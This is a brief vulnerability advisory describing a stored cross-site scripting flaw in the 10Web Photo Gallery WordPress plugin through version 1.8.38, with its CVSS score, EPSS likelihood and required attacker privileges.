The vulnerability is a stored Cross‑Site Scripting flaw in the WordPress Photo Gallery by 10Web plugin. User input fed to the photo gallery page is not properly escaped, allowing an attacker to inject arbitrary JavaScript that is later served to any user who views the gallery. This flaw is identified as CWE‑79 and carries a CVSS score of 5.9. An attacker who can insert malicious code would gain the ability to execute client‑side scripts, potentially hijacking user sessions or defacing content, without having direct control over the server.\n

Any installation of the 10Web Photo Gallery plugin for WordPress with a version of 1.8.38 or earlier is affected. The vulnerability is present from the earliest releases through to and including 1.8.38.\n

The risk rating is moderate due to the CVSS score of 5.9, but the Probability of Exploitation according to the EPSS is very low (<1%). The vulnerability is not listed in the CISA KEV catalog. The most likely attack vector is a web‑based form or interface that allows an attacker with sufficient privileges (such as an administrator or a user with gallery‑creation rights) to inject malicious script into a gallery field. Once stored, the script executes for any visitor to the affected gallery page, with full access to the browser context but not to the underlying server. The low exploitation likelihood reflects the need for the attacker to have some level of access to the WordPress backend or gallery management interface.